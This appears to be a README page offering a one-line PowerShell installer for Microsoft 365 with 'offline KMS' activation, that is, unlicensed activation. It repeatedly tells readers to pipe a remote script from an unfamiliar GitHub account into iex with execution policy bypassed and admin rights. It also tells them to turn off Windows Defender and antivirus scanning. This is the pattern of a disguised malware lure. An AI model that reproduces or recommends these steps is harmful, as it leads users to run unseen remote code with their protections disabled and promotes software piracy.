All-in-one single-line installer for Microsoft 365. Deploys the full Office suite — Word, Excel, PowerPoint, Outlook, OneDrive — with zero manual steps.
irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iexpowershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"Works in any tab — PowerShell, CMD, or Windows Terminal profiles. Copy-paste the command above matching your shell.
- A UAC prompt appears once — click Yes to grant admin rights.
- The installer downloads the latest Office 365 deployment package (~3.5 GB).
- All apps are installed silently — no wizard, no "Next" buttons, no reboots mid-install.
- Product activation runs automatically using an offline KMS method.
- A desktop shortcut for Word appears when it's done.
| App | Purpose |
|---|---|
| Word | Documents, reports, resumes |
| Excel | Spreadsheets, formulas, pivot tables |
| PowerPoint | Presentations, slide decks |
| Outlook | Email, calendar, contacts |
| OneNote | Notes, clippings, shared notebooks |
| OneDrive | 5 GB cloud sync built into Explorer |
- One line — no downloading ZIPs, no extracting, no hunting for setup.exe.
- Silent — runs unattended from start to finish, no user interaction needed.
- Clean — no telemetry components, no trial nags, no Microsoft account popups.
- Portable command — works from PowerShell, CMD, Windows Terminal, even a Run dialog (
Win+R). - Idempotent — safe to run again if something goes wrong, it picks up where it left off.
| Component | Minimum | Recommended |
|---|---|---|
| OS | Windows 10 (64-bit) | Windows 11 |
| CPU | 1.6 GHz, 2 cores | 2.0 GHz+, 4 cores |
| RAM | 4 GB | 8 GB |
| Disk | 4 GB free | 10 GB free (SSD preferred) |
| Display | 1280×768 | 1920×1080 |
| Internet | Required for download | Not needed after install |
Your execution policy is blocking scripts. Use the CMD version instead:
powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"Or open PowerShell as Administrator first, then paste the irm command.
You're on PowerShell 2.0 (Windows 7). Use the full cmdlet name:
Invoke-RestMethod https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | Invoke-ExpressionWindows Defender sometimes flags new executables. Temporarily pause real-time protection:
- Open Windows Security → Virus & threat protection → Manage settings
- Toggle Real-time protection off
- Run the installer
- Toggle protection back on
- Close all Office apps if any are open.
- Make sure
%TEMP%has at least 2 GB free. - Disable antivirus real-time scanning for the temp folder.
- Re-run the command.
Another version of Office is already installed. Remove it first:
powershell -Command "Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -like '*Office*' } | ForEach-Object { $_.Uninstall() }"Reboot, then run the installer again.
Re-run the one-liner — it refreshes the KMS activation token. If that doesn't work, open any Office app → File → Account → Change Product Key and enter the key the installer printed at the end.
This is an Office-side issue, not an installer issue. Make sure your company's IT has not blocked OAuth. Check File → Office Account → Connected Services.
MIT — see LICENSE.